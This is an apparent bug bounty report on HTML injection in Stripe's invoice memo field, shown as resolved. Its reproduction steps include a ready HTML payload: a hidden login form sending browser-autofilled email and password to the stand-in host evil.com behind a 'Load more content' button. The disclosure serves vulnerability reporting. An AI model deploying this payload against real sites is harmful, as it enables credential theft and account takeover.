Loading HuntDB...

HTML Injection in the Invoice memos field

Medium
S
Stripe
Submitted None
Reported by sn-shyk

Vulnerability Details

Technical details and impact analysis

Improper Access Control - Generic
## Summary: In customer invoices a memo field is vulnerable to HTML injection. So i can takeover any victim's account with auto-save functionality through HTML injection. Basically when we saved the login credential in our browser & tried to login into the account the browser automatically fills the email & pass we just need to click on login. so I created a login form and make the email & password field invisible by setting Opacaity:0 in CSS and set my button name to "Load more content". ## Steps To Reproduce: 1. Login to your account and save your email and password in your browser 2. Go to https://dashboard.stripe.com/invoices. Create new invoice or edit any invoice 3. Memo field is vulnerable to HTML injection. So just paid this HTML code to memo field "<form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " 4. Save the invoice. Now open that invoice in a new tab. 5. You can see a "load more content" button there. Just click on that button and in evil.com you will find your email and password in URL. 6. You can takeover any victim's account by sending that invoice ## Supporting Material/References: https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da ## Impact Takeover any victim's account

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$500.00

Submitted

Weakness

Improper Access Control - Generic